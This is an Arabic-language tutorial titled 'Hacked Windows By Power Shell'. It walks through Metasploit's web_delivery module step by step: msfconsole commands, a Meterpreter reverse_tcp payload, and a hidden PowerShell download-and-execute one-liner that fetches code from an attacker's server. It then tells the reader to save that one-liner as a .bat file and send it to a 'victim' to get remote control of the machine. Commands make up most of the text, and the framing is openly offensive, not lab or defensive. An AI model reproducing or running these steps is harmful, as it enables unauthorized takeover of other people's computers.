Hacked Windows By Power Shell

Hacked Windows By Power Shell

PlusX4


السلام عليكم و رحمة الله و بركاته

اليوم شرحنا عن

أختراق Windows عن طريق Power Shell باستغلال ثغرة web_delivery

+) ماهو Power Shell ~>

هو عبارة عن أمر او مجموعة من الأوامر التنفيذية التي تكتب في cmd او ما يسمى موجه الأوامر " أمتداده يكون bat ويمكن تحويله إلى ملف بأمتداد exe "

+) أوامر الأستغلال


أولاً نقوم بتشغيل الميتاسبلويت

$ sudo msfstart && msfconsole

ثم نقوم بكتابة

$ use exploit/multi/script/web_delivery

$ show targets

الآن نختار رقم 2 وهو PSH والذي يعني Power Shell

$ set target 2

ثم نكتب الاوامر التالية

$ set payload windows/meterpreter/reverse_tcp

$ set LHOST <ip>

$ set LPORT <port>

نكتب مكان <IP> الآيبي الخارجي اذا كان الاختراق خارجي او الآيبي الداخلي إذا كان الاختراق داخلي

ونكتب مكان <PORT> البورت ويفضل أن يكون 4444

ثم نكتب أمر

$ exploit

وننسخ

powershell.exe -nop -w hidden -c $a=new-object net.webclient;$a.proxy=[Net.WebRequest]::GetSystemWebProxy();$a.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $a.downloadstring('http://192.168.1.103:8080/AcgTlVy');


ثم نحفظه بملف بإمتداد bat ونرسله ل ضحية

وعند فتحه سيصلنا التبليغ وتم اختراق الضحية


#PlusX4



Report content on this page

Report Page

Please submit your DMCA takedown request to dmca@telegram.org